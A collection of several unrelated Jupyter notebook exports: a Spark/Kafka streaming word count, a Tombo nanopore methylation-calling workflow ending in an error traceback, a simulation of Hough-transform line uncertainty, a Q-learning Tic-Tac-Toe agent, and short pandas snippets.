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) ###Code from datetime import datetime now = datetime.now() current_time = now.strftime("%H:%M:%S") print("Current Time =", current_time) sc = pyspark.SparkContext() ssc = StreamingContext(sc,5) kafka_topic_name = "reco-train" kafka_bootstrap_servers = 'localhost:9092' kvs = KafkaUtils.createStream(ssc, kafka_bootstrap_servers, 'spark-streaming-consumer', {kafka_topic_name:1}) kvs = KafkaUtils.createDirectStream(ssc, [kafka_topic_name], {"metadata.broker.list": kafka_bootstrap_servers}) kvs = KafkaUtils.createDirectStream(ssc, [kafka_topic_name], { 'bootstrap.servers':kafka_bootstrap_servers, 'group.id':'test-group', 'auto.offset.reset':'largest'}) lines = kvs.map(lambda x: x[1]) counts = lines.flatMap(lambda line: line.split(' ')) counts = lines.flatMap(lambda line: line.split(' ')).map(lambda word: (word, 1)).reduceByKey(lambda a, b: a+b) counts.pprint() ssc.start() # stream will run for 50 sec ssc.awaitTerminationOrTimeout(50) ssc.stop() sc.stop() ###Output ------------------------------------------- Time: 2021-06-25 03:46:50 ------------------------------------------- ------------------------------------------- Time: 2021-06-25 03:46:55 ------------------------------------------- ------------------------------------------- Time: 2021-06-25 03:47:00 ------------------------------------------- ------------------------------------------- Time: 2021-06-25 03:47:05 ------------------------------------------- ------------------------------------------- Time: 2021-06-25 03:47:10 ------------------------------------------- ------------------------------------------- Time: 2021-06-25 03:47:15 ------------------------------------------- ------------------------------------------- Time: 2021-06-25 03:47:20 ------------------------------------------- ------------------------------------------- Time: 2021-06-25 03:47:25 ------------------------------------------- ------------------------------------------- Time: 2021-06-25 03:47:30 ------------------------------------------- ------------------------------------------- Time: 2021-06-25 03:47:35 ------------------------------------------- ------------------------------------------- Time: 2021-06-25 03:47:40 -------------------------------------------
germinated_spores-Tombo_basepair_modification_version_1/germinated_spores_1.ipynb
###Markdown Tombo is a suite of tools primarily for the identification of modified nucleotides from nanopore sequencing data, it Re-annotates raw signal with genomic alignment from existing basecalls* This script will identify the modified bases in the sequencesInput* fastq files * reference genome.fasta Make sure before you run any of your samples, you define your directories ###Code import os FAST5IN_DIR = '../../analyses/single_fast5s/germinated_spores/rep1/' GENOME_fn = '../../data/genomic_resources/chr_A_B_unassigned.fasta' OUT_DIR = '../../analyses/methylation_calling/germinated_spores/' Tombo_exc ='../../../anaconda3/bin/tombo' ##define your directories' pathway by giving them absoulte path. FAST5IN_DIR = os.path.abspath(FAST5IN_DIR) GENOME_fn = os.path.abspath(GENOME_fn) OUT_DIR = os.path.abspath(OUT_DIR) Tombo_exc = os.path.abspath(Tombo_exc) !ls {FAST5IN_DIR} !ls {GENOME_fn} !{Tombo_exc} --version Tombo_index = ###This step creates an index from raw nanopore reads and stores the raw signal alignments required to perform downstream analysis !{Tombo_exc} resquiggle {FAST5IN_DIR} {GENOME_fn} --processes 15 --num-most-common-errors 5 ###this command will detect for modification !{Tombo_exc} detect_modifications alternative_model --fast5-basedirs {FAST5IN_DIR} \ --statistics-file-basename germinated_spores_rep1.stats \ --alternate-bases 5mC 6mA --processes 15 #plot raw signal at most significant 5mC locations !{Tombo_exc} plot most_significant --fast5-basedirs {FAST5IN_DIR} \ --statistics-filename germinated_spores.5mC.tombo.stats \ --plot-standard-model --plot-alternate-model 5mC \ --pdf-filename germinated_spores_rep_1_most_significant_5mC_sites.pdf ###Output [09:55:45] Loading statistics from file. ******************** ERROR ******************** Statistics file not provided or provided file does not exist. ******************** ERROR ******************** Statistics file not provided or provided file does not exist. Traceback (most recent call last): File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 2680, in __init__ self._parse_stats() File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 2564, in _parse_stats 'Statistics file not provided or provided file does not exist.') File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_helper.py", line 361, in error_message_and_exit sys.exit() SystemExit During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 3233, in TomboStats stats = ModelStats(stat_fn) File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 2684, in __init__ 'tombo/scripts/convert_stats.py if this stats file ' + tombo.tombo_helper.TomboError: Invalid statistics file provided. Try running tombo/scripts/convert_stats.py if this stats file was created before Tombo v1.3.1 During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 3141, in __init__ self._parse_stats() File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 2564, in _parse_stats 'Statistics file not provided or provided file does not exist.') File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_helper.py", line 361, in error_message_and_exit sys.exit() SystemExit During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/home/jamila/anaconda3/bin/tombo", line 11, in <module> sys.exit(main()) File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/__main__.py", line 279, in main _plot_commands.plot_main(args) File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/_plot_commands.py", line 2343, in plot_main plot_most_signif(*base_args, **kwargs) File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/_plot_commands.py", line 2007, in plot_most_signif plot_intervals = ts.TomboStats(stats_fn).get_most_signif_regions( File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 3235, in TomboStats stats = LevelStats(stat_fn) File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 3145, in __init__ 'tombo/scripts/convert_stats.py if this stats file ' + tombo.tombo_helper.TomboError: Invalid statistics file provided. Try running tombo/scripts/convert_stats.py if this stats file was created before Tombo v1.3.1
examples/notebooks/Statistical_error_analysis_of_line_extraction.ipynb
###Markdown Statisical error analysis of line uncertainty We want to find a mean and variance for the parameters of the Hough transform for line extraction in 2 dimensions as a function of the length between two points. This will be a good starting point for comparing the relative accuracy of lines vs points. ###Code %matplotlib inline # Simulations import numpy as np import scipy import matplotlib.pyplot as plt from scipy.stats import norm N = 50000 img_size = 1000 #Average side length bins = 100 L = 500 #pixels (average length) sigma = 5./np.sqrt(12) #5 pixel uncertainty, assumed uniform theta = np.random.uniform(-np.pi*0.85, np.pi*0.85, N) x1 = np.random.uniform(0, img_size, (N, 2)) dx = np.array([np.sin(-theta)*L, np.cos(-theta) * L]).transpose() x2 = x1 + dx ro = x1[:, 0]*np.cos(theta) + x1[:, 1] * np.sin(theta) dtheta = np.zeros(N) dro = np.zeros(N) for i in range(N): x1_measured = np.random.multivariate_normal(x1[i], sigma*np.identity(2)) x2_measured = np.random.multivariate_normal(x2[i], sigma*np.identity(2)) dx_measured = x2_measured-x1_measured theta_measured = np.arctan2(-dx_measured[0], dx_measured[1]) ro_measured = x1_measured[0]*np.cos(theta_measured) + x1_measured[1] * np.sin(theta_measured) ro_measured_2 = x2_measured[0]*np.cos(theta_measured) + x2_measured[1] * np.sin(theta_measured) dtheta[i] = theta[i]-theta_measured dro[i] = ro[i] - ro_measured ans = np.histogram(dtheta, bins, density = True) y_theta = ans[0] x_theta = ans[1][:-1] sig_theta = np.std(dtheta) print(sig_theta) plt.plot(x_theta,y_theta, "-b", x_theta, norm.pdf(x_theta, 0, sig_theta), "-r") plt.xlabel("$\\Delta \\theta$") plt.ylabel("$p(\\Delta \\theta)$") plt.legend(["Simulation", "Approximation"]) ans = np.histogram(dro/sigma, bins, range= (-5, 5), density = True) y_ro = ans[0] x_ro = ans[1][:-1] sig_ro = np.std(dro/sigma) print(sig_ro) def double_exp_pdf(x, var): b = np.sqrt(var/2) return 1/(2*b)*np.exp(-np.abs(x)/b) plt.plot(x_ro, y_ro, "-b", x_ro, double_exp_pdf(x_ro, sig_ro**2), "-r") plt.xlabel("$\\frac{\\Delta r}{\\sigma}$") plt.ylabel("$p(\\Delta r)$") plt.legend(["Simulation", "Approximation"]) ###Output 1.6622574229981983 ###Markdown Want to find https://stats.stackexchange.com/questions/3215/trigonometric-operations-on-standard-deviations$$ \hat{\theta} = \tan^{-1}(\Delta Y/\Delta X) $$ $$ \theta = \theta_0 + \Delta \theta$$$$ \Delta Y = \sigma_y \zeta + \mu_y$$$$ \Delta X = \sigma_x \xi + \mu_x$$where $\zeta, \xi$ are standard normal distributions. For simplicity we will assume that $\sigma_y = \sigma_x = \sigma$, $ \mu_y = \sin(\theta_0) L $, and $ \mu_x = \cos(\theta_0) L$ where $L$ is the distance$$ P[\hat{\theta} \le \theta] = P[\tan^{-1}(\Delta Y/\Delta X) \le \theta_0 + \Delta \theta] = P[\Delta Y/\Delta X \le \tan(\Delta \theta + \theta_0)] $$Let $q = \tan(\theta) = \tan(\Delta \theta + \theta_0) $$$ = P[\sigma \zeta + \mu_y \le q (\sigma_y \zeta + \mu_y)] $$$$ = P[\frac{\sigma}{L} (\zeta - q \xi) \le q \sin(\theta_0) - \cos(\theta_0)] $$This is a difference of gaussians giving a new gaussian being smaller than a function of $\theta$ and $\theta_0$. Let $b(\theta) = q \sin(\theta_0) - \cos(\theta_0) $ and $\sigma^*(\theta) = (\frac{\sigma}{L})^2(1 + \tan(\theta)^2)$ . The expression then becomes: $$ P[\hat{\theta} \le \theta] = \int_{-\infty}^{b(\theta)} \mathcal{N}\left(z; 0, \sigma^*(\theta) \right) dz $$ We have that $$ p(\theta) = \frac{d(P[\hat{\theta} \le \theta])}{d\theta} = \mathcal{N}\left(b(\theta); 0, \sigma^*(\theta) \right) \cdot \frac{db(\theta)}{d\theta} + \int_{-\infty}^{b(\theta)} \frac{d\left(\mathcal{N}\left(z; 0, \sigma^*(\theta) \right)\right)}{d\theta} dz$$ This simplifies to: $$ p(\theta) =\mathcal{N}\left(b(\theta); 0,\sigma^*(\theta) \right) \cdot \left(\frac{db(\theta)}{d\theta} + \frac{d((\sigma^*(\theta))^{-2})}{d\theta}\right) + \frac{1}{\sigma^*(\theta)}\frac{d\sigma^*(\theta) }{d\theta} \int_{-\infty}^{b(\theta)} \mathcal{N}\left(z; 0, \sigma^*(\theta) \right) dz$$ ###Code import sympy as sp from sympy import symbols, exp, init_printing, latex, tan, atan, cos, sin init_printing() sig, theta, theta0, L = symbols("sigma theta theta_0 L") mux = L * cos(theta0) muy = L * sin(theta0) Z = (muy * (sig + 1) - mux * (sig + 1) * tan(theta - theta0))**2 / (2 * (sig**2 + sig**2 + tan(theta - theta0)**2)) expr = Z.diff(theta).diff(theta).subs(theta, 0) expr.subs(theta0, 0) ###Output _____no_output_____
TicTacToe/TicTacToe_Agent.ipynb
###Markdown Tic-Tac-Toe Agent​In this notebook, you will learn to build an RL agent (using Q-learning) that learns to play Numerical Tic-Tac-Toe with odd numbers. The environment is playing randomly with the agent, i.e. its strategy is to put an even number randomly in an empty cell. The following is the layout of the notebook: - Defining epsilon-greedy strategy - Tracking state-action pairs for convergence - Define hyperparameters for the Q-learning algorithm - Generating episode and applying Q-update equation - Checking convergence in Q-values Importing librariesWrite the code to import Tic-Tac-Toe class from the environment file ###Code # from <TC_Env> import <TicTacToe> - import your class from environment file import collections import numpy as np import random import pickle import time from matplotlib import pyplot as plt from TCGame_Env import TicTacToe from tqdm import tqdm # Function to convert state array into a string to store it as keys in the dictionary # states in Q-dictionary will be of form: x-4-5-3-8-x-x-x-x # x | 4 | 5 # ---------- # 3 | 8 | x # ---------- # x | x | x def Q_state(state): return ('-'.join(str(e) for e in state.flatten().astype(int))).replace('0','x') # Defining a function which will return valid (all possible actions) actions corresponding to a state # Important to avoid errors during deployment. def valid_actions(state): valid_Actions = [] valid_Actions = [i for i in env.action_space(state)[0]] ###### -------please call your environment as env return valid_Actions # Defining a function which will add new Q-values to the Q-dictionary. def add_to_dict(state): state1 = Q_state(state) valid_act = valid_actions(state) if state1 not in Q_dict.keys(): for action in valid_act: Q_dict[state1][action]=0 ###Output _____no_output_____ ###Markdown Epsilon-greedy strategy - Write your code here(you can build your epsilon-decay function similar to the one given at the end of the notebook) ###Code # Defining epsilon-greedy policy. def epsilon_greedy_strategy(state, time): epsilon = min_epsilon + np.exp(-0.000001*time) * (max_epsilon - min_epsilon) rand = np.random.random() if rand > epsilon: greedy_action = max(Q_dict[Q_state(state)],key=Q_dict[Q_state(state)].get) else: greedy_action = random.sample(valid_actions(state),1)[0] return greedy_action ###Output _____no_output_____ ###Markdown Tracking the state-action pairs for checking convergence - write your code here ###Code # Initialise Q_dictionary as 'Q_dict' and States_tracked as 'States_track' (for convergence) Q_dict = collections.defaultdict(dict) States_track = collections.defaultdict(dict) # Initialise few random states to be tracked def initialise_tracking_states(): sample_action_values = [('1-x-x-x-x-4-x-x-x',(7,5)), ('x-2-x-x-x-x-5-x-x',(5,7)), ('x-8-x-7-x-x-x-x-x',(8,1)), ('x-x-x-1-6-x-x-x-x',(5,3)), ('7-4-x-x-x-6-3-x-x',(3,5)), ('x-9-5-x-x-x-8-4-x',(0,3)), ('2-7-x-x-6-x-x-3-x',(8,7)), ('x-8-x-x-x-x-x-9-x',(8,1)), ('x-6-x-x-x-x-x-x-1',(0,9)), ('1-2-x-x-x-6-7-x-x',(4,9)), ('5-7-x-X-x-x-2-6-x',(2,3)), ('7-x-6-x-x-4-9-x-x',(8,5)), ('x-8-5-x-4-x-x-1-x',(6,9)), ('9-x-3-x-4-x-x-x-8',(1,1))] for q_value in sample_action_values: state = q_value[0] action = q_value[1] States_track[state][action] = [] def preview_game(current_status): val = current_status.split('-') print("\n "+str(val[0])+" | "+str(val[1])+" | "+str(val[2])+" ") print('-----------') print(" "+str(val[3])+" | "+str(val[4])+" | "+str(val[5])+" ") print('-----------') print(" "+str(val[6])+" | "+str(val[7])+" | "+str(val[8])+" \n") preview_game('9-x-3-x-4-x-x-x-8') #Defining a function to save the Q-dictionary as a pickle file def save_obj(obj, name ): with open(name + '.pkl', 'wb') as f: pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL) def save_tracking_states(): for state in States_track.keys(): for action in States_track[state].keys(): if state in Q_dict and action in Q_dict[state]: States_track[state][action].append(Q_dict[state][action]) initialise_tracking_states() States_track ###Output _____no_output_____ ###Markdown Define hyperparameters ---write your code here ###Code # total no. of episodes EPISODES = 5000000 # learning rate LR = 0.20 # discount factor GAMMA = 0.8 # no. of episodes after which states_tracked will be saved threshold = 2500 # no.of epishods after which preive the status of games played checkpoint_print_episodes = 500000 # Min_Greed: 0.1% min_epsilon = 0.001 # Greed: 100% max_epsilon = 1.0 ###Output _____no_output_____ ###Markdown Q-update loop ---write your code here ###Code start_time = time.time() q_track={} q_track['1-x-x-x-x-4-x-x-x']=[] q_track['x-2-x-x-x-x-5-x-x']=[] q_track['x-8-x-7-x-x-x-x-x']=[] q_track['x-x-x-1-6-x-x-x-x']=[] q_track['7-4-x-x-x-6-3-x-x']=[] q_track['x-9-5-x-x-x-8-4-x']=[] q_track['2-7-x-x-6-x-x-3-x']=[] q_track['x-8-x-x-x-x-x-9-x']=[] q_track['x-6-x-x-x-x-x-x-1']=[] q_track['1-2-x-x-x-6-7-x-x']=[] q_track['5-7-x-X-x-x-2-6-x']=[] q_track['7-x-6-x-x-4-9-x-x']=[] q_track['x-8-5-x-4-x-x-1-x']=[] q_track['9-x-3-x-4-x-x-x-8']=[] agent_won_count = 0 env_won_count = 0 tie_count = 0 for episode in tqdm(range(EPISODES)): ##### Start writing your code from the next line env = TicTacToe() current_state = env.state ## Initalizing parameter for the episodes reward=0 total_reward = 0 is_terminal = False # adding the current state to dictionary add_to_dict(current_state) while not is_terminal: current_lookup = Q_state(current_state) # applying epislon-greedy policy method current_action = epsilon_greedy_strategy(current_state, episode) if Q_state(current_state) in q_track.keys(): q_track[Q_state(current_state)].append(current_action) next_state,reward,is_terminal, msg = env.step(current_state,current_action) next_lookup = Q_state(next_state) if is_terminal: q_value_max = 0 # Tracking the count of games won by agent and environment if msg == "Agent Won!": agent_won_count += 1 elif msg == "Environment Won!": env_won_count += 1 else: tie_count += 1 else: add_to_dict(next_state) max_next = max(Q_dict[next_lookup],key=Q_dict[next_lookup].get) q_value_max = Q_dict[next_lookup][max_next] Q_dict[current_lookup][current_action] += LR * ((reward + (GAMMA * (q_value_max))) - Q_dict[current_lookup][current_action]) current_state = next_state total_reward += reward if (episode + 1) % checkpoint_print_episodes == 0: print("After playing %d games, Agent Won : %.4f, Environment Won : %.4f, Tie : %.4f"% (episode + 1, agent_won_count / (episode + 1), env_won_count /(episode + 1), tie_count / (episode + 1))) if ((episode + 1) % threshold) == 0: save_tracking_states() if ((episode + 1) % 1000000) == 0: print('Processed %dM episodes'%((episode+1)/1000000)) elapsed_time = time.time() - start_time save_obj(States_track,'States_tracked') save_obj(Q_dict,'Policy') print('Total Execution time: ', elapsed_time) ###Output 10%|█ | 500208/5000000 [06:31<57:39, 1300.63it/s] ###Markdown Check the Q-dictionary ###Code len(Q_dict) # try checking for one of the states - that which action your agent thinks is the best -----This will not be evaluated Q_dict['x-2-x-x-x-x-5-x-x'] ###Output _____no_output_____ ###Markdown Check the states tracked for Q-values convergence(non-evaluative) ###Code # Write the code for plotting the graphs for state-action pairs tracked plt.figure(0, figsize=(16,7)) plt.subplot(241) t1=States_track['x-2-x-x-x-x-5-x-x'][(5,7)] plt.title("(s,a)='x-2-x-x-x-x-5-x-x',(5,7)") plt.plot(np.asarray(range(0, len(t1))),np.asarray(t1)) plt.subplot(242) t2=States_track['1-x-x-x-x-4-x-x-x'][(7,5)] plt.title("(s,a)='1-x-x-x-x-4-x-x-x',(7,5)") plt.plot(np.asarray(range(0, len(t2))),np.asarray(t2)) plt.subplot(243) t3=States_track['9-x-3-x-4-x-x-x-8'][(1,1)] plt.title("(s,a)='9-x-3-x-4-x-x-x-8',(1,1)") plt.plot(np.asarray(range(0, len(t3))),np.asarray(t3)) plt.subplot(244) t4=States_track['x-8-5-x-4-x-x-1-x'][(6,9)] plt.title("(s,a)='x-8-5-x-4-x-x-1-x',(6,9)") plt.plot(np.asarray(range(0, len(t4))),np.asarray(t4)) plt.show() ###Output _____no_output_____ ###Markdown Epsilon - decay check ###Code max_epsilon = 1.0 min_epsilon = 0.001 time = np.arange(0,5000000) epsilon = [] for i in range(0,5000000): epsilon.append(min_epsilon + (max_epsilon - min_epsilon) * np.exp(-0.000001*i)) plt.plot(time, epsilon) plt.show() ###Output _____no_output_____
docs/_sources/python/pandas.ipynb
###Markdown Pandas count unique words in a column ###Code results = set() df['text'].str.lower().str.split().apply(results.update) n_words = len(results) n_words ###Output _____no_output_____ ###Markdown Random sample for each class ###Code def random_balance_subset(df, n=2000): """select random n sample for each class Args: df (df): with y label as e.g. [0, 1] n (int): num """ list_of_dataframes = [] ys = list(df['y'].unique()) for y in ys: subsample = df[df['y'] == y].sample(n=n, random_state=CONFIG['seed']) list_of_dataframes.append(subsample) res = pd.concat(list_of_dataframes) return res df_mini = random_balance_subset(df) df_mini['y'].value_counts() ###Output _____no_output_____ ###Markdown convert dataframe to csv ###Code df.to_csv('train_mini.csv') ###Output _____no_output_____ ###Markdown index reset ###Code df.reset_index(drop=True, inplace=True) ###Output _____no_output_____
notebooks/E_datarequest.ipynb
